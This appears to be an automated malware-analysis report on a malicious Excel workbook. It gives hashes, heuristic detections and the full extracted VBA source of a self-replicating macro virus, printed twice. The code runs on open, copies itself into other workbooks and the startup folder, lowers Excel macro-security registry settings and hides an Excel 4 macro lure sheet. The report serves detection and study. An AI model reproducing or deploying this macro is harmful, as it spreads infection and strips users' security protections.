Office (OLE) malware analysis — malicious · 247a7b4118f85c19

MALICIOUS

Office (OLE)

47.5 KB Created: 2006-11-13 22:29:33 Authoring application: Microsoft Excel First seen: 2015-10-04

MD5: cb9902ab7ae788598ef7941343143090 SHA-1: 2ae18b0578af3ab95b2b559e9d8557d27be5be0f SHA-256: 247a7b4118f85c19ad3a0a0612db9242ee4cc7913b0fe0d996efc87d11e14f90

424 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The file is an Excel spreadsheet containing VBA macros. The Workbook_open and Auto_Open events are present, indicating potential auto-execution upon opening. Critical heuristics indicate the use of WScript.Shell and potential shell calls, suggesting the macro attempts to execute arbitrary commands. The presence of 'VBA macro-virus self-replication / AV tampering' and 'Macro/content-enable lure' heuristics further supports a malicious intent, likely to download and execute a secondary payload.

Heuristics 12

ClamAV: Xls.Malware.Mailcab-6776806-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Mailcab-6776806-0
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set oWshell = CreateObject("WScript.Shell")
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
.InsertLines 1, "Public WithEvents xx As Application"
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Private Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    FName = Environ("Temp") & "\" & ModuleName & ".bas"
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10590 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10590 bytes
SHA-256: `5e19973f3544629d020f24e0f462f1e46e345d49e51443950bef33235079a7a8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public WithEvents xx As Application Attribute xx.VB_VarHelpID = -1 Private Sub Workbook_open() Set xx = Application On Error Resume Next Application.DisplayAlerts = False Call Do_What End Sub Private Sub xx_workbookOpen(ByVal wb As Workbook) On Error Resume Next wb.VBProject.References.AddFromGuid _ GUID:="{0002E157-0000-0000-C000-000000000046}", _ Major:=5, Minor:=3 Application.ScreenUpdating = False Application.DisplayAlerts = False CopyStart wb Application.ScreenUpdating = True End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "echo" Private Sub Auto_Open() Application.DisplayAlerts = False If ThisWorkbook.Path <> Application.StartupPath Then Application.ScreenUpdating = False Call Delete_This_WK Call CopyToWorkBook If Sheets(1).Name <> "Macro1" Then MoveMacro4 ThisWorkbook ThisWorkbook.Save Application.ScreenUpdating = True End If End Sub Private Sub CopyToWorkBook() Const DQUOTE = """" With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule .InsertLines 1, "Public WithEvents xx As Application" .InsertLines 2, "Private Sub Workbook_open()" .InsertLines 3, "Set xx = Application" .InsertLines 4, "On Error Resume Next" .InsertLines 5, "Application.DisplayAlerts = False" .InsertLines 6, "Call Do_What" .InsertLines 7, "End Sub" .InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)" .InsertLines 9, "On Error Resume Next" .InsertLines 10, "wb.VBProject.References.AddFromGuid _" .InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _" .InsertLines 12, "Major:=5, Minor:=3" .InsertLines 13, "Application.ScreenUpdating = False" .InsertLines 14, "Application.DisplayAlerts = False" .InsertLines 15, "CopyStart wb" .InsertLines 16, "Application.ScreenUpdating = True" .InsertLines 17, "End Sub" End With End Sub Private Sub Delete_This_WK() Dim VBProj As VBIDE.VBProject Dim VBComp As VBIDE.VBComponent Dim CodeMod As VBIDE.CodeModule Set VBProj = ThisWorkbook.VBProject Set VBComp = VBProj.VBComponents("ThisWorkbook") Set CodeMod = VBComp.CodeModule With CodeMod .DeleteLines 1, .CountOfLines End With End Sub Function Do_What() If ThisWorkbook.Path <> Application.StartupPath Then RestoreAfterOpen Call OpenDoor Call Microsofthobby Call Hacking End If End Function Function CopyStart(ByVal wb As Workbook) On Error Resume Next Dim VBProj1 As VBIDE.VBProject Dim VBProj2 As VBIDE.VBProject Set VBProj1 = Workbooks("echo.xls").VBProject Set VBProj2 = wb.VBProject If CopyModule("echo", VBProj1, VBProj2, False) Then Exit Function End Function Function CopyModule(ModuleName As String, _ FromVBProject As VBIDE.VBProject, _ ToVBProject As VBIDE.VBProject, _ OverwriteExisting As Boolean) As Boolean On Error Resume Next Dim VBComp As VBIDE.VBComponent Dim FName As String Dim CompName As String Dim S As String Dim SlashPos As Long Dim ExtPos As Long Dim TempVBComp As VBIDE.VBComponent If FromVBProject Is Nothing Then CopyModule = False Exit Function End If If Trim(ModuleName) = vbNullString Then CopyModule = False Exit Function End If If ToVBProject Is Nothing Then CopyModule = False Exit Function End If If FromVBProject.Protection = vbext_pp_locked Then CopyModule = False Exit Function End If If ToVBProject.Protection = vbext_pp_locked Then CopyModule = False Exit Function End If On Error Resume Next Set VBComp = FromVBProject.VBComponents(ModuleName) If Err.Number <> 0 Then CopyModule = False Exit Function End If FName = Environ("Temp") & "\" & ModuleName & ".bas" If OverwriteExisting = True Then If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then Err.Clear Kill FName If Err.Number <> 0 Then CopyModule = False Exit Function End If End If With ToVBProject.VBComponents .Remove .Item(ModuleName) End With Else Err.Clear Set VBComp = ToVBProject.VBComponents(ModuleName) If Err.Number <> 0 Then If Err.Number = 9 Then Else CopyModule = False Exit Function End If End If End If FromVBProject.VBComponents(ModuleName).Export FileName:=FName SlashPos = InStrRev(FName, "\") ExtPos = InStrRev(FName, ".") CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1) Set VBComp = Nothing Set VBComp = ToVBProject.VBComponents(CompName) If VBComp Is Nothing Then ToVBProject.VBComponents.Import FileName:=FName Else If VBComp.Type = vbext_ct_Document Then Set TempVBComp = ToVBProject.VBComponents.Import(FName) With VBComp.CodeModule .DeleteLines 1, .CountOfLines S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines) .InsertLines 1, S End With On Error GoTo 0 ToVBProject.VBComponents.Remove TempVBComp End If End If Kill FName CopyModule = True End Function Function Microsofthobby() Dim myfile0 As String Dim MyFile As String On Error Resume Next myfile0 = ThisWorkbook.FullName MyFile = Application.StartupPath & "\echo.xls" If WorkbookOpen("echo.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("echo.xls").Close False shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus If ThisWorkbook.Path <> Application.StartupPath Then Application.ScreenUpdating = False ThisWorkbook.IsAddin = True ThisWorkbook.SaveCopyAs MyFile ThisWorkbook.IsAddin = False Application.ScreenUpdating = True End If End Function Function OpenDoor() Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String Dim KValue1 As Variant, KValue2 As Variant Dim VS As String On Error Resume Next VS = Application.Version Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT") RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM" RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level" RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM" RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level" KValue1 = 1 KValue2 = 1 Call WReg(RK1, KValue1, "REG_DWORD") Call WReg(RK2, KValue2, "REG_DWORD") Call WReg(RK3, KValue1, "REG_DWORD") Call WReg(RK4, KValue2, "REG_DWORD") End Function Sub WReg(strkey As String, Value As Variant, ValueType As String) Dim oWshell Set oWshell = CreateObject("WScript.Shell") If ValueType = "" Then oWshell.RegWrite strkey, Value Else oWshell.RegWrite strkey, Value, ValueType End If Set oWshell = Nothing End Sub Private Sub MoveMacro4(ByVal wb As Workbook) On Error Resume Next Dim sht As Object wb.Sheets(1).Select Sheets.Add Type:=xlExcel4MacroSheet ActiveSheet.Name = "Macro1" Range("A2").Select ActiveCell.FormulaR1C1 = "=ERROR(FALSE)" Range("A3").Select ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)" Range("A4").Select ActiveCell.FormulaR1C1 = "=ALERT(""禁用宏，关闭 " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)" Range("A5").Select ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)" Range("A6").Select ActiveCell.FormulaR1C1 = "=END.IF()" Range("A7").Select ActiveCell.FormulaR1C1 = "=RETURN()" For Each sht In wb.Sheets wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False Next wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden End Sub Private Function WorkbookOpen(WorkBookName As String) As Boolean WorkbookOpen = False On Error GoTo WorkBookNotOpen If Len(Application.Workbooks(WorkBookName).Name) > 0 Then WorkbookOpen = True Exit Function End If WorkBookNotOpen: End Function Private Function RestoreAfterOpen() Dim sht, del_sht, rng, del_frag As Boolean On Error Resume Next del_sht = ActiveSheet.Name Application.ScreenUpdating = False Application.DisplayAlerts = False For Each sht In ThisWorkbook.Sheets If sht.Name <> "Macro1" Then sht.Visible = xlSheetVisible Next For Each rng In Sheets(del_sht).Range("A1:F15") If InStr(rng.Value, "CONFIDENTIAL") > 0 Then del_frag = True Exit For End If Next If del_frag = True Then Sheets(del_sht).Delete Application.ScreenUpdating = True End Function Private Sub Hacking() 'this's hacking code shell "explorer tencent://message/?uin=654486740" End Sub

SHA-256: 5e19973f3544629d020f24e0f462f1e46e345d49e51443950bef33235079a7a8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call Do_What
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid _
GUID:="{0002E157-0000-0000-C000-000000000046}", _
Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
CopyStart wb
Application.ScreenUpdating = True
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "echo"

Private Sub Auto_Open()
Application.DisplayAlerts = False
If ThisWorkbook.Path <> Application.StartupPath Then
  Application.ScreenUpdating = False
  Call Delete_This_WK
  Call CopyToWorkBook
  If Sheets(1).Name <> "Macro1" Then MoveMacro4 ThisWorkbook
  ThisWorkbook.Save
  Application.ScreenUpdating = True
End If
End Sub

Private Sub CopyToWorkBook()
  Const DQUOTE = """"
  With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
.InsertLines 1, "Public WithEvents xx As Application"
.InsertLines 2, "Private Sub Workbook_open()"
.InsertLines 3, "Set xx = Application"
.InsertLines 4, "On Error Resume Next"
.InsertLines 5, "Application.DisplayAlerts = False"
.InsertLines 6, "Call Do_What"
.InsertLines 7, "End Sub"
.InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
.InsertLines 9, "On Error Resume Next"
.InsertLines 10, "wb.VBProject.References.AddFromGuid _"
.InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"
.InsertLines 12, "Major:=5, Minor:=3"
.InsertLines 13, "Application.ScreenUpdating = False"
.InsertLines 14, "Application.DisplayAlerts = False"
.InsertLines 15, "CopyStart wb"
.InsertLines 16, "Application.ScreenUpdating = True"
.InsertLines 17, "End Sub"
End With
End Sub

Private Sub Delete_This_WK()
Dim VBProj As VBIDE.VBProject
Dim VBComp As VBIDE.VBComponent
Dim CodeMod As VBIDE.CodeModule
Set VBProj = ThisWorkbook.VBProject
Set VBComp = VBProj.VBComponents("ThisWorkbook")
Set CodeMod = VBComp.CodeModule
With CodeMod
    .DeleteLines 1, .CountOfLines
End With
End Sub

Function Do_What()
If ThisWorkbook.Path <> Application.StartupPath Then
  RestoreAfterOpen
  Call OpenDoor
  Call Microsofthobby
  Call Hacking
End If
End Function

Function CopyStart(ByVal wb As Workbook)
On Error Resume Next
Dim VBProj1 As VBIDE.VBProject
Dim VBProj2 As VBIDE.VBProject
Set VBProj1 = Workbooks("echo.xls").VBProject
Set VBProj2 = wb.VBProject
If CopyModule("echo", VBProj1, VBProj2, False) Then Exit Function
End Function

Function CopyModule(ModuleName As String, _
    FromVBProject As VBIDE.VBProject, _
    ToVBProject As VBIDE.VBProject, _
    OverwriteExisting As Boolean) As Boolean
    On Error Resume Next
    Dim VBComp As VBIDE.VBComponent
    Dim FName As String
    Dim CompName As String
    Dim S As String
    Dim SlashPos As Long
    Dim ExtPos As Long
    Dim TempVBComp As VBIDE.VBComponent

    If FromVBProject Is Nothing Then
        CopyModule = False
        Exit Function
    End If
    
    If Trim(ModuleName) = vbNullString Then
        CopyModule = False
        Exit Function
    End If
    
    If ToVBProject Is Nothing Then
        CopyModule = False
        Exit Function
    End If
    
    If FromVBProject.Protection = vbext_pp_locked Then
        CopyModule = False
        Exit Function
    End If
    
    If ToVBProject.Protection = vbext_pp_locked Then
        CopyModule = False
        Exit Function
    End If
    
    On Error Resume Next
    Set VBComp = FromVBProject.VBComponents(ModuleName)
    If Err.Number <> 0 Then
        CopyModule = False
        Exit Function
    End If
   
    FName = Environ("Temp") & "\" & ModuleName & ".bas"
    If OverwriteExisting = True Then
       
        If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
            Err.Clear
            Kill FName
            If Err.Number <> 0 Then
                CopyModule = False
                Exit Function
            End If
        End If
        With ToVBProject.VBComponents
            .Remove .Item(ModuleName)
        End With
    Else
        
        Err.Clear
        Set VBComp = ToVBProject.VBComponents(ModuleName)
        If Err.Number <> 0 Then
            If Err.Number = 9 Then
               
            Else
               
                CopyModule = False
                Exit Function
            End If
        End If
    End If
   
    FromVBProject.VBComponents(ModuleName).Export FileName:=FName
   
    SlashPos = InStrRev(FName, "\")
    ExtPos = InStrRev(FName, ".")
    CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)
    
    Set VBComp = Nothing
    Set VBComp = ToVBProject.VBComponents(CompName)
    
    If VBComp Is Nothing Then
        ToVBProject.VBComponents.Import FileName:=FName
    Else
        If VBComp.Type = vbext_ct_Document Then
            
            Set TempVBComp = ToVBProject.VBComponents.Import(FName)
           
            With VBComp.CodeModule
                .DeleteLines 1, .CountOfLines
                S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)
                .InsertLines 1, S
            End With
            On Error GoTo 0
            ToVBProject.VBComponents.Remove TempVBComp
        End If
    End If
    Kill FName
    CopyModule = True
End Function

Function Microsofthobby()
Dim myfile0 As String
Dim MyFile As String
On Error Resume Next
myfile0 = ThisWorkbook.FullName
MyFile = Application.StartupPath & "\echo.xls"
If WorkbookOpen("echo.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("echo.xls").Close False
shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus

If ThisWorkbook.Path <> Application.StartupPath Then
     Application.ScreenUpdating = False
     ThisWorkbook.IsAddin = True
     ThisWorkbook.SaveCopyAs MyFile
     ThisWorkbook.IsAddin = False
     Application.ScreenUpdating = True
End If
End Function

Function OpenDoor()
Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String
Dim KValue1 As Variant, KValue2 As Variant
Dim VS As String
On Error Resume Next
VS = Application.Version
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"

KValue1 = 1
KValue2 = 1

      Call WReg(RK1, KValue1, "REG_DWORD")
      Call WReg(RK2, KValue2, "REG_DWORD")
      Call WReg(RK3, KValue1, "REG_DWORD")
      Call WReg(RK4, KValue2, "REG_DWORD")

End Function

Sub WReg(strkey As String, Value As Variant, ValueType As String)
    Dim oWshell
    Set oWshell = CreateObject("WScript.Shell")
    If ValueType = "" Then
        oWshell.RegWrite strkey, Value
    Else
        oWshell.RegWrite strkey, Value, ValueType
    End If
    Set oWshell = Nothing
End Sub


Private Sub MoveMacro4(ByVal wb As Workbook)
On Error Resume Next

  Dim sht As Object

    wb.Sheets(1).Select
    Sheets.Add Type:=xlExcel4MacroSheet
    ActiveSheet.Name = "Macro1"
   
    Range("A2").Select
    ActiveCell.FormulaR1C1 = "=ERROR(FALSE)"
    Range("A3").Select
    ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)"
    Range("A4").Select
    ActiveCell.FormulaR1C1 = "=ALERT(""禁用宏，关闭 " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)"
    Range("A5").Select
    ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)"
    Range("A6").Select
    ActiveCell.FormulaR1C1 = "=END.IF()"
    Range("A7").Select
    ActiveCell.FormulaR1C1 = "=RETURN()"
    
    For Each sht In wb.Sheets
    wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False
    Next
    wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden
End Sub

Private Function WorkbookOpen(WorkBookName As String) As Boolean
  WorkbookOpen = False
  On Error GoTo WorkBookNotOpen
  If Len(Application.Workbooks(WorkBookName).Name) > 0 Then
    WorkbookOpen = True
    Exit Function
  End If
WorkBookNotOpen:
End Function

Private Function RestoreAfterOpen()
Dim sht, del_sht, rng, del_frag As Boolean
On Error Resume Next
del_sht = ActiveSheet.Name
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For Each sht In ThisWorkbook.Sheets
    If sht.Name <> "Macro1" Then sht.Visible = xlSheetVisible
Next
For Each rng In Sheets(del_sht).Range("A1:F15")
If InStr(rng.Value, "CONFIDENTIAL") > 0 Then
del_frag = True
Exit For
End If
Next
If del_frag = True Then Sheets(del_sht).Delete
Application.ScreenUpdating = True

End Function

Private Sub Hacking()
'this's hacking code
shell "explorer tencent://message/?uin=654486740"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.